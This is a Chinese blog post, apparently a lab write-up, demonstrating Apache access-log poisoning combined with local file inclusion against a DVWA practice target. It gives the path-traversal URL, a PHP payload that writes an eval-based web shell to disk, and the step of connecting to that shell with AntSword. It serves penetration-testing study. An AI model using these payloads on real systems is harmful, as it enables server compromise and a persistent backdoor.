中间件日志包含绕过

最新推荐文章于 2024-09-08 19:46:28 发布
最新推荐文章于 2024-09-08 19:46:28 发布
阅读量998 收藏 15
点赞数 40
分类专栏: 文件包含漏洞 文章标签: 中间件 网络安全 web安全 笔记 文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73049307/article/details/142031520
版权

当某个PHP文件只存在本地包含漏洞,不存在远程包含漏洞,而却无法上传正常文件(无上传功能),这就意味这有包含漏洞却不能拿来利用,这时攻击者就有可能会利用apache日志文件来入侵。

Apache服务器运行后会生成两个日志文件,这两个文件是access.log(访问日志)和error.log(错误日志),apache的日志文件记录下我们的操作,并且写到访问日志文件access.log之中。

以Apache为例,每次成功访问的记录都会记录在access.log下,访问失败的记录会记录在error.log下,如图所示:

但打开之后却是一片空白,按理说是有很多记录的

打开httpd.conf文件,找到CustomLog "logs/access.log" common,发现前面也没有#注释

换成phpstudy2018来做实验吧,还是一样的去掉#注释,重启phpstudy,重新打开DVWA靶场就发现有记录了,再去找到phpstudy2018的apache目录下的access.log文件

(注意:access.log的文件内容是可以删掉的,只不过Ctrl S保存会让你另存为的,这里我删了,方便后续查看内容)

下面就以DVWA靶场为例:(Low难度,phpstudy2018,win11开启phpstudy服务,win7虚拟机访问)

没想到出现了allow_url_include功能没开启的情况:

打开php.ini文件,找到allow_url_include项,修改状态为On,再重启phpstudy:

访问http://10.4.27.70/<?php phpinfo();?>

查看access.log可以看到被二次编码了:

用burp抓包还原:

查看access.log文件可以看到已经正常记录了:

接下来就要用文件包含了,在地址栏中输入:

http://10.4.27.70/DVWA/vulnerabilities/fi/?page=../../../../Apache/logs/access.log

为什么相对路径是这样呢?

当前目录是vulnerabilities/fi

第一级返回vulnerabilities目录

第二级返回DVWA目录

第三级返回WWW目录

第四级返回PHPTutorial目录

第五级返回phpstudy2018目录

第六级返回E盘

E:\phpstudy2018\PHPTutorial\WWW\DVWA\vulnerabilities\fi

E:\phpstudy2018\PHPTutorial\Apache\logs\access.log

所以是../../../../Apache/logs/access.log(要加多一个../才行)

可以看到成功访问

编写一句话木马并用burp抓包改包:

<?php $file=fopen('test1.php','w'); fputs($file,'<?php @eval($_POST[123]);?>');?>

在地址栏中输入:

http://10.4.27.70/DVWA/vulnerabilities/fi/?page=../../../../Apache/logs/access.log

用文件包含漏洞触发一句话木马后是可以看到在/DVWA/vulnerabilities/fi/目录下生成了个test1.php文件

用中国蚁剑连接:

http://10.4.27.70/DVWA/vulnerabilities/fi/test1.php

成功利用中间件日志包含漏洞!

南暮思鸢
关注
  • 40
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Scrapy 2.6 Spider Middleware 爬虫页中间件内置参数
Mr数据杨
02-03 3万+
除了 Scrapy 提供的内置中间件,开发者还可以根据实际需求编写自定义的 Spider 中间件。自定义中间件允许你在请求和响应处理的各个阶段添加自定义逻辑,满足特定项目的需求。例如,你可以编写一个中间件来过滤掉某些特定的请求、修改请求头、处理特定的响应格式,或者记录额外的日志信息。在一个电商爬虫项目中,你可能需要对每个请求添加动态的用户代理(User-Agent),以模拟不同用户的访问行为。
Scrapy 2.6 Downloader Middleware 下载器中间件内置参数
热门推荐
Mr数据杨
02-03 3万+
本教程详细介绍了 Scrapy 2.6 版本中内置的下载器中间件。每个中间件在不同的场景下提供了强大的功能,如自动处理 Cookies、遵循robots.txt规则、管理 HTTP 认证和代理等。通过理解和灵活运用这些中间件,开发者可以显著提升爬虫的性能和适应性。在实际应用中,这些工具帮助爬虫有效应对网络环境和目标网站的复杂性,实现高效、稳定的数据抓取。掌握这些中间件的使用后,你将能够更自信地设计和部署复杂的爬虫项目,并根据具体需求定制解决方案。
渗透测试-中间件日志包含绕过和php文件读写包含
lza20001103的博客
04-27 1670
文件包含中间件日志包含绕过
文件包含漏洞之——中间件日志包含绕过
温柔小薛的博客
04-08 876
中间件日志包含绕过 使用情况 当某个PHP文件只存在本地包含漏洞,不存在远程包含漏洞,而却无法上传正常文件(无上传功能),这就意味这有包含漏洞却不能拿来利用,这时攻击者就有可能会利用apache日志文件来入侵。 中间件日志 Apache服务器运行后会生成两个日志文件,这两个文件是access.log(访问日志)和error.log(错误日志),apache的日志文件记录下我们的操作,并且写到...
00截断上传绕过_文件上传利用绕过方式总结
weixin_39774219的博客
12-20 853
前端验证1.1 修改前端 javascript 文件将限制代码去掉1.2 传参过程中抓包修改后缀1.3 前端禁用 javascript 脚本后端验证2.1基于 MIME 校验2.1.1 校验 content-type 请求头2.1.2 修改文件后缀2.2基于后缀绕过2.2.1黑名单验证绕过2.2.1.1针对 windows 系统绕过2.2.1.1.1 使用其他可执行并且未限制的后缀名2.2...
一些基础的入侵绕过姿势案例分析
si1ence的博客
01-20 697
0x0 背景 谈论起溯源本质上是安全人员对多源数据的一些关联分析,结合自己的经验对攻击者手法路径的还原。所谓的数据来源主要还是流量层面的安全告警(依赖于WAF、IPS一类的设备的检出能力)、流量层面设备的审计记录(记录所有的网络行为)、主机层面的日志(系统日志中间件日志、数据库日志等),简单分享一些在实际场景中遇见的一些比较有意思的场景; 0x1 Shiro场景 Apache Shiro Java反序列化是今年比较热门的漏洞之一;Shiro提供了记住我(RememberMe)的功能对...
Nacos 1.4.1 紧急升级修复Alibaba Nacos 认证绕过漏洞
bufegar0的博客
01-14 6824
使用背景 Nacos是Spring Cloud Alibaba的微服务的配置和发现的组件,目前暴露出安全漏洞,主要包括如下: 根据Nacos官方在github发布的issue,Alibaba Nacos存在一处认证绕过漏洞。由于对User-Agent字段判断规则不完善,Nacos开启鉴权后攻击者仍可以绕过鉴权访问任意http接口,从而进行访问用户列表、添加用户等任意操作,风险极大。 官方紧急修复 用户升级至Nacos 1.4.1版本后即可解决此问题。 特征 -[ #978 ]支持IPv6。 -[ #3917
【C C++服务器开发】中间件的含义及常用中间件介绍_c+(1)
2401_84263208的博客
04-18 808
DDL 包括 CREATE、DROP、ALTER 等动作。在数据库中使用 CREATE 来创建新表,DROP 来删除表,ALTER 负责数据库对象的修改。例如,创建学生信息表使用以下命令:在实践中,可根据实际情况进行权衡,或者在软件层面提供配置方式,由用户决定如何选择 CAP 策略。CAP 理论可用在不同的层面,可以根据 CAP 原理定制局部的设计策略,例如,在分布式系统中,每个节点自身的数据是能保证 CA 的,但在整体上又要兼顾 AP 或 CP。
Scrapy 2.6 Downloader Middleware 下载器中间件基本使用
Mr数据杨
08-31 196
在本教程中,我们深入探讨了 Scrapy 2.6 下载器中间件的基本使用方法及其核心功能。下载器中间件是 Scrapy 框架中的一个强大组件,它允许开发者在请求和响应的各个阶段进行定制化操作,从而实现更灵活和强大的数据抓取任务。Scrapy 的下载器中间件提供了强大的扩展性和灵活性,使得开发者可以定制化控制爬虫的行为,适应各种复杂的网络环境和抓取需求。掌握这些方法,将极大提升你在实际爬虫开发中的效率和能力。
中间件是什么
QQ1817117243的博客
09-03 910
中间件是软件架构中的重要组成部分,提供了应用程序之间的通信、数据管理和其他服务。它使得开发者能够更高效地构建和维护复杂的分布式系统,尤其是在微服务架构和云计算环境中。
分布式中间件-几个常用的消息中间件
最新发布
wendao76的专栏
09-08 1088
分布式, 消息中间件
中间件解析漏洞
shw_yzh的博客
09-05 630
IIS apache nginx
ASP.NET Core 中间件
Warbin的博客
09-06 1338
中间件是一种装配到 ASP.NET Core 应用程序请求处理管道中的软件组件,用于处理 HTTP 请求和响应。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8455
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-06 1640
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
Web安全之SQL注入:如何预防及解决
J老熊
09-07 1378
SQL注入是一种通过在用户输入中嵌入恶意SQL代码的攻击方式。攻击者可以利用漏洞在未经授权的情况下访问数据库,执行原本不被允许的操作。例如,攻击者可以绕过身份验证、检索敏感信息,甚至删除数据。SQL注入是Web应用程序中最常见且最危险的安全漏洞之一,尤其是在涉及数据库操作的场景下,如电商交易系统。通过使用、严格的输入验证、最小权限原则以及使用ORM框架等方法,我们可以有效防止SQL注入攻击。开发人员需要养成良好的编码习惯,始终考虑潜在的安全问题,确保应用程序的安全性。
网络安全】服务基础第二阶段——第三节:Linux系统管理基础----Linux用户与组管理
goldfish8848的博客
09-07 750
SUID、SGID 和 Sticky Bit 都在Linux提权中扮演了重要⻆⾊。
如何启动网络安全计划:首先要做的事情
网络研究观
09-07 958
保护数据不是一次性的活动,而是一个持续的适应和改进过程。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值